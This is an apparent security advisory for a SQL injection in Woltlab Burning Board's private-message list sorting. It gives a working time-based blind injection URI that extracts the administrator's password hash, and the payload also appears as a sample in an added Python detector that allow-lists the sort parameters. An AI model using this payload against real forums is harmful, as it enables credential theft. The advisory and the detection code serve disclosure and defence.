Woltlab Burning Board 'password' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URI and exploit code are available:

http://www.example.com/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC, (SELECT password FROM wcf1_user WHERE userID=1 AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))
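A detection sketch for the request shape shown above, added here as an example and not taken from the advisory or from Woltlab's code: it flags requests whose sortOrder is anything other than ASC or DESC, or whose sortField is not a bare identifier. The function names, the allow-list and the identifier rule are assumptions; the second and third sample URIs are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_SORT_ORDERS = {"ASC", "DESC"}
# Assumption: a legitimate sortField is a bare column identifier.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def check_sort_params(uri):
    """Return (parameter, decoded value) pairs that fail the allow-list."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    findings = []
    for value in query.get("sortOrder", []):
        if value.upper() not in ALLOWED_SORT_ORDERS:
            findings.append(("sortOrder", value))
    for value in query.get("sortField", []):
        if not IDENTIFIER.fullmatch(value):
            findings.append(("sortField", value))
    return findings


BASE = ("http://www.example.com/wbb3/index.php?page=PMList&folderID=0"
        "&pageNo=1&sortField=isViewed&sortOrder=")
SAMPLES = [
    # URI from the advisory text above.
    BASE + "ASC, (SELECT password FROM wcf1_user WHERE userID=1 AND "
           "IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))",
    # Constructed: ordinary request.
    BASE + "DESC",
    # Constructed: percent-encoded, as it would appear in an access log.
    BASE + "ASC%2C%20%28SELECT%201%29",
]


def flagged(uris):
    """Return only the URIs with at least one finding, with the findings."""
    return [(u, f) for u in uris if (f := check_sort_params(u))]


if __name__ == "__main__":
    for uri, findings in flagged(SAMPLES):
        print(findings)
```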